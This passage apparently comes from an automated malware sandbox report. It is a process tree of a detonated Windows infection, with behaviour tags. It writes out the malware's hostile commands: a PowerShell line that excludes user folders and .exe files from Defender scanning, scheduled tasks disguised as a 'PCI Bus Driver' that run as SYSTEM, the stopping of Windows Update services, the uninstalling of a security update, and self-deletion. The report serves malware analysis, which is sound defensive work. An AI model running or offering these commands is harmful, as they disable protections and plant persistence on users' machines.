        C:\Users\Admin\AppData\Local\Temp\{C673682E-EF0B-429D-B048-DE85DC06B631}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{93468655-9ACF-4496-86EB-A95D08BDA4A6}
        5⤵
        Executes dropped EXE
        
        PID:7080
    - - C:\Users\Admin\AppData\Local\Temp\{C673682E-EF0B-429D-B048-DE85DC06B631}\ISBEW64.exe
        
        C:\Users\Admin\AppData\Local\Temp\{C673682E-EF0B-429D-B048-DE85DC06B631}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{C6B41B8A-484C-4552-846A-C3C5488BD82A}
        5⤵
        Executes dropped EXE
        
        PID:6268
    - - C:\Users\Admin\AppData\Local\Temp\{C673682E-EF0B-429D-B048-DE85DC06B631}\ISBEW64.exe
        
        C:\Users\Admin\AppData\Local\Temp\{C673682E-EF0B-429D-B048-DE85DC06B631}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{C217A135-FD60-412C-924A-5BDFEAE45090}
        5⤵
        Executes dropped EXE
        
        PID:6408
    - - C:\Users\Admin\AppData\Local\Temp\{C673682E-EF0B-429D-B048-DE85DC06B631}\ISBEW64.exe
        
        C:\Users\Admin\AppData\Local\Temp\{C673682E-EF0B-429D-B048-DE85DC06B631}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{E5C086E0-ADB6-4720-B3F1-388532F5748F}
        5⤵
        
        PID:1056
    - - C:\Users\Admin\AppData\Local\Temp\{C673682E-EF0B-429D-B048-DE85DC06B631}\ISBEW64.exe
        
        C:\Users\Admin\AppData\Local\Temp\{C673682E-EF0B-429D-B048-DE85DC06B631}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{960A92ED-E4DE-4A59-A1CF-1641645D0B70}
        5⤵
        
        PID:3000
    - - C:\Users\Admin\AppData\Local\Temp\{C673682E-EF0B-429D-B048-DE85DC06B631}\ISBEW64.exe
        
        C:\Users\Admin\AppData\Local\Temp\{C673682E-EF0B-429D-B048-DE85DC06B631}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{DB6EB4E4-F15F-4497-A765-30EF7743E3D1}
        5⤵
        
        PID:1100
    - - C:\Users\Admin\AppData\Local\Temp\{C673682E-EF0B-429D-B048-DE85DC06B631}\{38C49E83-05E9-4C6A-9256-6AA74482FDC5}\CamMenuMaker.exe
        
        C:\Users\Admin\AppData\Local\Temp\{C673682E-EF0B-429D-B048-DE85DC06B631}\{38C49E83-05E9-4C6A-9256-6AA74482FDC5}\CamMenuMaker.exe
        5⤵
        Loads dropped DLL
        
        PID:5436
      - C:\Users\Admin\AppData\Roaming\Uj_debug_v5\CamMenuMaker.exe
        
        C:\Users\Admin\AppData\Roaming\Uj_debug_v5\CamMenuMaker.exe
        6⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        
        PID:944
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5708
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        7⤵
        
        PID:6512
- - C:\Users\Admin\AppData\Local\Temp\10432840101\Rm3cVPI.exe
    "C:\Users\Admin\AppData\Local\Temp\10432840101\Rm3cVPI.exe"
    3⤵
    PID:1640
- - C:\Users\Admin\AppData\Local\Temp\10432850101\PJ7KEk9.exe
    "C:\Users\Admin\AppData\Local\Temp\10432850101\PJ7KEk9.exe"
    3⤵
    - Suspicious use of SetThreadContext
    PID:5724
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1484
- - C:\Users\Admin\AppData\Local\Temp\10432860101\05257e0038.exe
    "C:\Users\Admin\AppData\Local\Temp\10432860101\05257e0038.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:6752
  - - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
      "C:\Users\Admin\AppData\Local\Temp\10432860101\05257e0038.exe"
      4⤵
      PID:3500
- - C:\Users\Admin\AppData\Local\Temp\10432870101\i4cwegu.exe
    "C:\Users\Admin\AppData\Local\Temp\10432870101\i4cwegu.exe"
    3⤵
    PID:6164
- - C:\Users\Admin\AppData\Local\Temp\10432880101\j31kf1f.exe
    "C:\Users\Admin\AppData\Local\Temp\10432880101\j31kf1f.exe"
    3⤵
    PID:836
- - C:\Users\Admin\AppData\Local\Temp\10432890101\but2.exe
    "C:\Users\Admin\AppData\Local\Temp\10432890101\but2.exe"
    3⤵
    PID:5872
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "PCI Bus Driver" /tr C:\Drivers\pcidrv.exe /sc minute /mo 1 /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:7156
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "PCI Bus Driver Startup" /tr C:\Drivers\pcidrv.exe /sc onstart /ru SYSTEM /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5276
  - - C:\Drivers\pcidrv.exe
      C:\Drivers\pcidrv.exe
      4⤵
      PID:5472
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd" /C timeout /t 2 && del C:\Users\Admin\AppData\Local\Temp\10432890101\but2.exe
      4⤵
      PID:6528
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 2
        5⤵
        Delays execution with timeout.exe
        
        PID:2696
- - C:\Users\Admin\AppData\Local\Temp\10432900101\a95a3c8736.exe
    "C:\Users\Admin\AppData\Local\Temp\10432900101\a95a3c8736.exe"
    3⤵
    PID:6536
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:3904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4360 -ip 4360
1⤵
PID:5044

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1028

C:\ProgramData\Google\Chrome\updater.exe
C:\ProgramData\Google\Chrome\updater.exe
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:2568
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:1608
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:4232
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:5716
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:1188
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:5064
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:6128
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:4316
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:3092
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:1056
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:5612
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:5696
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:5228
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:1896
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:5652
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - Executes dropped EXE
  PID:692

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:1608
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - Executes dropped EXE
  PID:1524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:3524
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:6000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:3468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:2264
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:2876
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - Executes dropped EXE
  PID:3776

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:908
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:860
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - Executes dropped EXE
  PID:5840

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:5848
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5148

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:512
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - Executes dropped EXE
  PID:5280

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:3952
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4972

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:2960
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5132

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:2804
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - Executes dropped EXE
  PID:208

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:4424
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - Executes dropped EXE
  PID:3336

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:1040
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:6668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:3388
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - Executes dropped EXE
  PID:7052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6488
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:7108

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6496
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - Executes dropped EXE
  PID:6988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6964
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - Executes dropped EXE
  PID:4688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6972
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - Executes dropped EXE
  PID:1464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:5320
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - Executes dropped EXE
  PID:3252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6396
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - Executes dropped EXE
  PID:376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:5060
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5600

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:392
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - Executes dropped EXE
  PID:4320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:5296
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - Executes dropped EXE
  PID:6332

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:608
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:940

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:2624
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - Executes dropped EXE
  PID:5612

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:4420
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - Executes dropped EXE
  PID:5324

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:2444
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - Executes dropped EXE
  PID:6536

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:5932
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - Executes dropped EXE
  PID:6336

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:4092
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - Executes dropped EXE
  PID:3472

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6528
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - Executes dropped EXE
  PID:4044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:3176
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - Executes dropped EXE
  PID:5108

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:5840
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - Executes dropped EXE
  PID:4332

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6808
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:592
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - Executes dropped EXE
  PID:2832

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:4900
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:7148

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:3416
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:7152

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:988
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - Executes dropped EXE
  PID:5584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:4000
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - Executes dropped EXE
  PID:6628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:7072
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:6964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:5776
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - Executes dropped EXE
  PID:4300

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6452
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:7120
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - System Location Discovery: System Language Discovery
  PID:732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:1520
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:2188

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:5400
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - System Location Discovery: System Language Discovery
  PID:876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:4128
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:6100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6256
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:5512

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6188
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:5208
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:6944

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:1616
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:2928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:4760
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3672

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:5448
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3316

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6000
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:6740

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:1140
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6412

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:1632
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:6504

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:1916
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:4724

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6872
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:6284

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6480
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:5928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6436
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  PID:7084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6596
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5520

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:6696
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5484

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.exe" ..
1⤵
PID:5408
- C:\Users\Admin\AppData\Local\Temp\server.exe
  C:\Users\Admin\AppData\Local\Temp\server.exe ..
